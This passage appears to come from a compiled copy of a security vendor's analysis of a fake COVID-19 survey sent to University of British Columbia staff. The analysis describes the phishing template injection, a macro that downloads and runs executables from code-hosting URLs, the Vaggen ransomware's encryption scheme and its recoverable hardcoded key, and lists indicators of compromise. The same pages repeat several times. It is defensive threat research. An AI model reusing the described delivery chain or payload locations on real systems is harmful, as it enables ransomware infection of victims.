3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3049 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3050 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3051 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3052 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3053 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3054 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3055 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3056 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3057 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3058 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3059 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3060 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3061 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3062 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3063 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3064 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3065 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3066 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3067 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3068 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3069 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3070 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3071 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3072 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3073 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3074 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3075 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3076 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
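As an added example, not code from the original post or from the malware, the following Go program parses the .VAGGEN layout described above (12-byte nonce, encrypted content, 16-byte GCM tag) and recovers the content with the hardcoded key, which is the recovery the analysis says is possible. The sample blob is constructed inside the program with a fixed nonce (the real sample draws its nonce from CryptGenRandom); the function names ParseVaggen, DecryptVaggen and sealLikeVaggen and the sample text are assumptions of this example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

// Key quoted in the analysis above: 32 bytes, hence AES-256.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceLen = 12 // GCM standard nonce, as described for .VAGGEN files
	tagLen   = 16 // GCM standard tag, appended by gcm.Seal
)

// VaggenFile is the on-disk layout described in the analysis:
// nonce (12 bytes) | ciphertext | GCM tag (16 bytes).
type VaggenFile struct {
	Nonce      []byte
	Ciphertext []byte
	Tag        []byte
}

// ParseVaggen splits a .VAGGEN blob into its three fields. It rejects blobs
// too short to hold a nonce and a tag, i.e. an empty or truncated file.
func ParseVaggen(blob []byte) (*VaggenFile, error) {
	if len(blob) < nonceLen+tagLen {
		return nil, fmt.Errorf("blob of %d bytes cannot hold a %d-byte nonce and a %d-byte tag",
			len(blob), nonceLen, tagLen)
	}
	return &VaggenFile{
		Nonce:      blob[:nonceLen],
		Ciphertext: blob[nonceLen : len(blob)-tagLen],
		Tag:        blob[len(blob)-tagLen:],
	}, nil
}

// DecryptVaggen recovers the plaintext of a .VAGGEN blob with the given key.
// Go's AEAD Open expects ciphertext||tag as one slice, which is exactly what
// follows the nonce in this layout, so nothing has to be reassembled. A wrong
// key, a flipped byte or a truncated file all fail tag verification.
func DecryptVaggen(blob, key []byte) ([]byte, error) {
	if _, err := ParseVaggen(blob); err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	plain, err := gcm.Open(nil, blob[:nonceLen], blob[nonceLen:], nil)
	if err != nil {
		return nil, errors.New("authentication failed: wrong key or corrupted file")
	}
	return plain, nil
}

// sealLikeVaggen builds a constructed sample in the same layout by calling
// gcm.Seal with the nonce as output prefix, as the analysis describes. It only
// exists to produce test input for the decryptor; a fixed nonce is passed in
// so the sample is reproducible (the real sample uses CryptGenRandom).
func sealLikeVaggen(plain, key, nonce []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(nonce) != gcm.NonceSize() {
		return nil, errors.New("nonce must be 12 bytes")
	}
	return gcm.Seal(append([]byte(nil), nonce...), nonce, plain, nil), nil
}

func main() {
	key := []byte(vaggenKey)
	nonce := []byte("constructed!") // 12 bytes, constructed for this example
	blob, err := sealLikeVaggen([]byte("quarterly report, constructed sample"), key, nonce)
	if err != nil {
		panic(err)
	}
	f, _ := ParseVaggen(blob)
	fmt.Printf("nonce=%x ciphertext=%d bytes tag=%x\n", f.Nonce, len(f.Ciphertext), f.Tag)
	plain, err := DecryptVaggen(blob, key)
	fmt.Printf("recovered %q (err=%v)\n", plain, err)
}
```

The length check in ParseVaggen matters for a recovery tool run over a whole directory: a file cut short by a crash or a disk-full error should be reported, not fed to Open and reported as a key problem. Because GCM authenticates, a file that decrypts without error is known to be intact, which is the property that lets a defender verify recovered files without comparing them to backups.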
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3077 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3078 of 
